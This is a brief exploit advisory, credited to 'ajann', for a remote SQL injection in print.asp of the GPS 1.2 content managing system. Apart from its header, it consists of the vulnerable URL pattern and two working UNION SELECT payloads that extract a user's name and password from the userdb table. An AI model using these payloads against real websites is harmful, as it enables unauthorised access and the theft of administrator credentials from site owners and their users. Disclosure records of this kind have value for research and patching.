GPS version 1.2 suffers from a remote SQL injection vulnerability in print.asp.
cc591995364d5b916d837484b9841b6e9f180e6df2b57d4cbae3773daeeb406f
*******************************************************************************
# Title : GPS 1.2 Content Managing System (print.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : https://www.guox.de || https://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7227&lngWId=4
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
https://[target]/[path]//print.asp?id=[SQL]
Example:
//print.asp?id=-1%20union%20select%200,0,0,Benutzername,0%20from%20userdb%20where%20ID=10
//print.asp?id=-1%20union%20select%200,0,0,Passwort,0%20from%20userdb%20where%20ID=10
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!